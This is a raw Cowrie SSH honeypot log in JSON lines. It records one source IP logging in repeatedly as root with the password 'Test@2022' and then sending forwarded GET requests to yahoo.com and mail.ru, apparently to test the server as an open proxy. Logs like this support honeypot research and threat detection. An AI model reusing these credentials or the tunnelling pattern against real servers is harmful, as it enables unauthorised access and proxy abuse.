{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":6500,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:6500","sensor":"my-vps","timestamp":"2025-08-31T03:49:38.995664Z","session":"ae1b2d81f1f0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:39.049163Z","src_ip":"77.83.207.83","session":"ae1b2d81f1f0"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:39.103892Z","src_ip":"77.83.207.83","session":"ae1b2d81f1f0"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":10597,"dst_ip":"1.2.3.4","dst_port":22,"session":"826eae60f8f5","protocol":"ssh","message":"New connection: 77.83.207.83:10597 (1.2.3.4:22) [session: 826eae60f8f5]","sensor":"my-vps","timestamp":"2025-08-31T03:49:39.151951Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:39.162281Z","src_ip":"77.83.207.83","session":"826eae60f8f5"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:39.202209Z","src_ip":"77.83.207.83","session":"826eae60f8f5"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:39.449381Z","src_ip":"77.83.207.83","session":"826eae60f8f5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":1616,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:1616","sensor":"my-vps","timestamp":"2025-08-31T03:49:39.500376Z","session":"826eae60f8f5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:39.551077Z","src_ip":"77.83.207.83","session":"826eae60f8f5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":7375,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:7375","sensor":"my-vps","timestamp":"2025-08-31T03:49:39.691868Z","session":"826eae60f8f5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:39.741890Z","src_ip":"77.83.207.83","session":"826eae60f8f5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":10175,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:10175","sensor":"my-vps","timestamp":"2025-08-31T03:49:39.884100Z","session":"826eae60f8f5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:39.934059Z","src_ip":"77.83.207.83","session":"826eae60f8f5"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:39.984521Z","src_ip":"77.83.207.83","session":"826eae60f8f5"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":10698,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f4fe646f308","protocol":"ssh","message":"New connection: 77.83.207.83:10698 (1.2.3.4:22) [session: 6f4fe646f308]","sensor":"my-vps","timestamp":"2025-08-31T03:49:40.034772Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:40.044527Z","src_ip":"77.83.207.83","session":"6f4fe646f308"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:40.086269Z","src_ip":"77.83.207.83","session":"6f4fe646f308"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:40.339818Z","src_ip":"77.83.207.83","session":"6f4fe646f308"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":7895,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:7895","sensor":"my-vps","timestamp":"2025-08-31T03:49:40.392031Z","session":"6f4fe646f308"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:40.442875Z","src_ip":"77.83.207.83","session":"6f4fe646f308"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":23840,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:23840","sensor":"my-vps","timestamp":"2025-08-31T03:49:40.584942Z","session":"6f4fe646f308"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:40.635636Z","src_ip":"77.83.207.83","session":"6f4fe646f308"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":2074,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:2074","sensor":"my-vps","timestamp":"2025-08-31T03:49:40.781033Z","session":"6f4fe646f308"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:40.831666Z","src_ip":"77.83.207.83","session":"6f4fe646f308"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:40.883072Z","src_ip":"77.83.207.83","session":"6f4fe646f308"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":10797,"dst_ip":"1.2.3.4","dst_port":22,"session":"ccdcdf7556e2","protocol":"ssh","message":"New connection: 77.83.207.83:10797 (1.2.3.4:22) [session: ccdcdf7556e2]","sensor":"my-vps","timestamp":"2025-08-31T03:49:40.932058Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:40.932849Z","src_ip":"77.83.207.83","session":"ccdcdf7556e2"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:40.982698Z","src_ip":"77.83.207.83","session":"ccdcdf7556e2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44460,"dst_ip":"1.2.3.4","dst_port":22,"session":"e85542b54f8c","protocol":"ssh","message":"New connection: 212.227.235.229:44460 (1.2.3.4:22) [session: e85542b54f8c]","sensor":"my-vps","timestamp":"2025-08-31T03:49:41.225745Z"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:41.234833Z","src_ip":"77.83.207.83","session":"ccdcdf7556e2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":5406,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:5406","sensor":"my-vps","timestamp":"2025-08-31T03:49:41.286335Z","session":"ccdcdf7556e2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:41.337418Z","src_ip":"77.83.207.83","session":"ccdcdf7556e2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":1726,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:1726","sensor":"my-vps","timestamp":"2025-08-31T03:49:41.481184Z","session":"ccdcdf7556e2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:41.531732Z","src_ip":"77.83.207.83","session":"ccdcdf7556e2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":2607,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:2607","sensor":"my-vps","timestamp":"2025-08-31T03:49:41.672924Z","session":"ccdcdf7556e2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:41.723526Z","src_ip":"77.83.207.83","session":"ccdcdf7556e2"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:41.774918Z","src_ip":"77.83.207.83","session":"ccdcdf7556e2"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":10888,"dst_ip":"1.2.3.4","dst_port":22,"session":"81646ecf2471","protocol":"ssh","message":"New connection: 77.83.207.83:10888 (1.2.3.4:22) [session: 81646ecf2471]","sensor":"my-vps","timestamp":"2025-08-31T03:49:41.825406Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:41.835792Z","src_ip":"77.83.207.83","session":"81646ecf2471"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:41.876934Z","src_ip":"77.83.207.83","session":"81646ecf2471"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:42.132560Z","src_ip":"77.83.207.83","session":"81646ecf2471"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":7429,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:7429","sensor":"my-vps","timestamp":"2025-08-31T03:49:42.184788Z","session":"81646ecf2471"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:42.236361Z","src_ip":"77.83.207.83","session":"81646ecf2471"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":26055,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:26055","sensor":"my-vps","timestamp":"2025-08-31T03:49:42.381560Z","session":"81646ecf2471"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:42.432776Z","src_ip":"77.83.207.83","session":"81646ecf2471"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":32290,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:32290","sensor":"my-vps","timestamp":"2025-08-31T03:49:42.577509Z","session":"81646ecf2471"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:42.628576Z","src_ip":"77.83.207.83","session":"81646ecf2471"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:42.680264Z","src_ip":"77.83.207.83","session":"81646ecf2471"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":10963,"dst_ip":"1.2.3.4","dst_port":22,"session":"c28f9324b823","protocol":"ssh","message":"New connection: 77.83.207.83:10963 (1.2.3.4:22) [session: c28f9324b823]","sensor":"my-vps","timestamp":"2025-08-31T03:49:42.728422Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:42.728992Z","src_ip":"77.83.207.83","session":"c28f9324b823"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:42.778329Z","src_ip":"77.83.207.83","session":"c28f9324b823"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:43.025396Z","src_ip":"77.83.207.83","session":"c28f9324b823"}
